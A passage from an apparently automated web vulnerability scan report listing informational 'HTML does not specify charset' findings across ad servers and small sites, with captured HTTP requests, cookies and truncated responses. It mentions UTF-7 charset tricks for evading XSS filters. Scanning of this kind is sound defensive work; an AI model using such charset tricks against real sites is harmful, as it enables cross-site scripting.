Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205253329.1298773081.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1045503868-1298773082174; _jsuid=3082234540994859644; hash=SCll5XTF882lk; _chartbeat2=occw3y7oz7bpai8h; __unam=30dea60-12e64e877f0-4b740973-4; __utma=205253329.820591158.1298773079.1298773079.1298773079.1; __utmc=205253329; __utmb=205253329.4.10.1298773079; _bizo_cksm_crc32=CF9B3698; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=AC1D22CE7AF9EE3E; _bizo_np_stats=337%3D122%2C337%3D122%2C337%3D147%2C255%3D158%2C

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Expires: Wed, 09 Mar 2011 02:20:07 GMT
Content-Type: text/javascript
Date: Sun, 27 Feb 2011 02:20:07 GMT
X-Varnish: 311665559
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 216005

var tinymce={majorVersion:"3",minorVersion:"2.5",releaseDate:"2009-06-29",_init:function(){var o=this,k=document,l=window,j=navigator,b=j.userAgent,h,a,g,f,e,m;o.isOpera=l.opera&&opera.buildNumber;o.i
...[SNIP]...
<base href="'+F.documentBaseURI.getURI()+'" />'}F.iframeHTML+='<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />';if(n.relaxedDomain){F.iframeHTML+='<script type="text/javascript">
...[SNIP]...

15. HTML does not specify charset  previous  next
There are 92 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.



15.1. http://ad.doubleclick.net/adi/N1260.gawkernetwork/B5173555.12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.gawkernetwork/B5173555.12

Request

GET /adi/N1260.gawkernetwork/B5173555.12;sz=300x250;pc=[TPAS_ID];ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.businessinsider.com/gabriel-weinberg-duckduckgo-2011-1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6063
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 01 Mar 2011 01:55:29 GMT
Expires: Tue, 01 Mar 2011 01:55:29 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

15.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAl12x8lrTYPrB4m1sQe_0sHvCo2HpOsBhaKK8hLjqLazM_DLmgIQARgBIL7O5Q04AFDEwrTWBmDJhqOH1KOAEKABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAV9maWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9uZXRzcGFya2VyL2Jvb2xlYW4tc3FsLWluamVjdGlvbi1kYXRhYmFzZS11c2VyLWFkbWluLXhzcy1iaXpmaW5kLnVzLmh0bbgCGMACBcgC5e_FGKgDAdEDgo3m5suica71AwAAAMQ&num=1&sig=AGiWqtyRQEvi6hNd5BHN9N011_vfoVSX9g&client=ca-pub-4063878933780912&adurl=;ord=196821162? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1298931268&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fboolean-sql-injection-database-user-admin-xss-bizfind.us.htm&dt=1298909668737&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298909668759&frm=0&adk=1607234649&ga_vid=1614914732.1298909669&ga_sid=1298909669&ga_hid=454076219&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1116&bih=939&fu=0&ifi=1&dtd=88&xpc=pfUEHUtOKO&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 908
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 28 Feb 2011 16:14:00 GMT
Expires: Mon, 28 Feb 2011 16:14:00 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3abc/c/1a3/%2a/
...[SNIP]...

15.3. http://adam.companypond.com/peeps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adam.companypond.com
Path:   /peeps.php

Request

GET /peeps.php?email=4240be8e2dc90b4aef080848af60435f&bio=no HTTP/1.1
Host: adam.companypond.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:51:56 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=0aab2193f55fe523d049a0486cdcd9d3; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 108

<a style="font-size:small" href="http://www.companypond.com" title="companypond">Powered by CompanyPond</a>

15.4. http://alexgorbatchev.com/SyntaxHighlighter/donate.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alexgorbatchev.com
Path:   /SyntaxHighlighter/donate.html

Request

GET /SyntaxHighlighter/donate.html HTTP/1.1
Host: alexgorbatchev.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:10:52 GMT
Server: Apache
Last-Modified: Mon, 21 Feb 2011 17:03:43 GMT
ETag: "19a2c4c8-3a5f-49ccdd89959c0"
Accept-Ranges: bytes
Content-Length: 14943
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<?xml version='1.0' encoding='utf-8' ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns='http://www.w3.org/1999/xhtml'>
<hea
...[SNIP]...

15.5. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/3992-121072-16279-0

Request

GET /ad/js/3992-121072-16279-0?mpt=773835526&mpvc=http://at.atwola.com/adlink/5113/1838224/0/6/AdId=1491683;BnId=1;itime=773835526;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311146;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 499
Date: Sun, 27 Feb 2011 02:30:36 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838224/0/6/AdId=1491683;BnId=1;itime=773835526;kvpg=techcrunch/2011/02/16/forbes-accused-of-link-;kvugc=0;kvmn=93311146;kvtid
...[SNIP]...

15.6. http://api.qwerly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.qwerly.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: api.qwerly.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=78868500.1298945321.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2075914333-1298947790163; __utma=78868500.1042130367.1298945321.1298945321.1298947759.2; __utmc=78868500; __utmb=78868500.4.10.1298947759

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Tue, 01 Mar 2011 02:49:30 GMT
Server: Mashery Proxy

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

15.7. http://bassett.in/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bassett.in
Path:   /

Request

GET / HTTP/1.1
Host: bassett.in
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Sun, 27 Feb 2011 16:36:03 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 3753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...

15.8. http://bassett.in/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bassett.in
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: bassett.in
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 16:36:05 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 389

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

15.9. http://bnxs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bnxs.com
Path:   /

Request

GET /?xd_receiver=1 HTTP/1.1
Host: bnxs.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=27af2be0f5522ec5d18f4af38e86ba9e&extern=0&channel=http%3A%2F%2Fbnxs.com%2F%3Fxd_receiver%3D1&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=a4f97e2-12e67f5fa04-30536e6f-1; __utmz=173815280.1298824297.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173815280.1099129627.1298824297.1298824297.1298824297.1; __utmc=173815280; __utmb=173815280.1.10.1298824297

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:31:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xd</title></head>
<body>
<script
...[SNIP]...

15.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2240932&PluID=0&w=125&h=125&ord=773835603&ucm=true&ncu=$$http://at.atwola.com/adlink/5113/1838229/0/6/AdId=1468660;BnId=1;itime=773835603;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311151;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; eyeblaster=BWVal=&BWDate=&debuglevel=; A3=heSmakII0c9M00001hK5JalZa0bfZ00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8z6A0000000001tq8qaI0000000001tn; u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; expires=Fri, 27-May-2011 21:30:37 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=heSmakII0c9M00001hK5JalZa0bfZ00002hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; expires=Fri, 27-May-2011 21:30:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8z6A0000000002tq8qaI0000000001tn; expires=Fri, 27-May-2011 21:30:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g; expires=Fri, 27-May-2011 21:30:37 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 27 Feb 2011 02:30:36 GMT
Connection: close
Content-Length: 2191

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

15.11. http://capgeminicom.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicom.112.2o7.net
Path:   /crossdomain.xml

Request

GET /crossdomain.xml HTTP/1.1
Host: capgeminicom.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/ext/video_library/swf/player_onsite.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:50:16 GMT
Server: Omniture DC/2.0.0
xserver: www601
Content-Type: text/html
Content-Length: 167

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

15.12. http://cdn.at.atwola.com/_media/uac/tcode3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.at.atwola.com
Path:   /_media/uac/tcode3.html

Request

GET /_media/uac/tcode3.html HTTP/1.1
Host: cdn.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; CfP=1; JEB2=4D69B03E6E651A440C6EAF39F001EBEA

Response

HTTP/1.1 200 OK
P3P: CP="CURo TAIo PSAo IVAo IVDo LOC ONL UNI COM NAV STA DEM OUR"
Last-Modified: Thu, 21 Oct 2010 16:47:37 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Mon, 28 Feb 2011 02:32:10 GMT
Date: Sun, 27 Feb 2011 02:32:10 GMT
Connection: close
Content-Length: 1944

<HTML>
<BODY>
<SCRIPT TYPE='text/javascript'>
var exdoms = new Array("webcenter.polls.aol.com");
var oncedoms = new Array ("aim.com", "bebo.com", "icq.com","ads.web.aol.com");
var url=''
try {url=docu
...[SNIP]...

15.13. http://cdn.cloudscan.us/examples/plesk-reports/plesk-target.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.cloudscan.us
Path:   /examples/plesk-reports/plesk-target.html

Request

GET /examples/plesk-reports/plesk-target.html HTTP/1.1
Host: cdn.cloudscan.us
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=108330077.1298820847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=137-1298826559386; __utma=108330077.800258796.1298820847.1298826554.1298905777.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 28 Feb 2011 22:36:23 GMT
Accept-Ranges: bytes
ETag: "808d36ed97d7cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 28 Feb 2011 22:36:36 GMT
Content-Length: 109608

<html><head><title>Target Analysis Report | Plesk SMB 10.2.0 | Hoyt LLC</title>
<meta name="description" content="Target Analysis File from Burp Suite Pro 1.3.08">
<meta name="keywords" content="XSS,
...[SNIP]...

15.14. http://cloudscan.us/images/plesk-cover-1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cloudscan.us
Path:   /images/plesk-cover-1.jpg

Request

GET /images/plesk-cover-1.jpg HTTP/1.1
Host: cloudscan.us
Proxy-Connection: keep-alive
Cache-Control: max-age=0
If-Modified-Since: Thu, 10 Feb 2011 18:07:29 GMT
If-None-Match: "1ec23e614dc9cb1:0"
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=108330077.1298820847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=876-1298820851852; __utma=108330077.800258796.1298820847.1298826554.1298905777.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Mon, 28 Feb 2011 22:06:07 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

15.15. http://dakwak.com/socket.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dakwak.com
Path:   /socket.html

Request

GET /socket.html?dsa3d&xdm_e=http://donttrack.us&xdm_c=default0&xdm_p=1 HTTP/1.1
Host: dakwak.com
Proxy-Connection: keep-alive
Referer: http://donttrack.us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 01:56:38 GMT
Server: Apache/2.2.9 (Debian) Phusion_Passenger/3.0.3
Last-Modified: Sun, 27 Feb 2011 18:11:26 GMT
ETag: "15436c-40b5-49d477dd20f80"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16565

<!doctype html>
<html>
<head>
<script type="text/javascript">
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.rep
...[SNIP]...

15.16. http://dev.qwerly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dev.qwerly.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: dev.qwerly.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=78868500.1298945321.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=60340024.1298947790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60340024.188782387.1298947790.1298947790.1298947790.1; __utmc=60340024; __utmb=60340024.1.10.1298947790; __qca=P0-2075914333-1298947790163; __utma=78868500.1042130367.1298945321.1298945321.1298947759.2; __utmc=78868500; __utmb=78868500.4.10.1298947759

Response

HTTP/1.1 404 Not Found
P3P: policyref="/w3c/p3p.xml",CP="CAO COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT STA"
Content-Length: 9
ETag: "135d4069"
Content-type: text/html
Date: Tue, 01 Mar 2011 02:49:38 GMT
Server: Mashery Proxy

Not found

15.17. http://developer.klout.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.klout.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: developer.klout.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
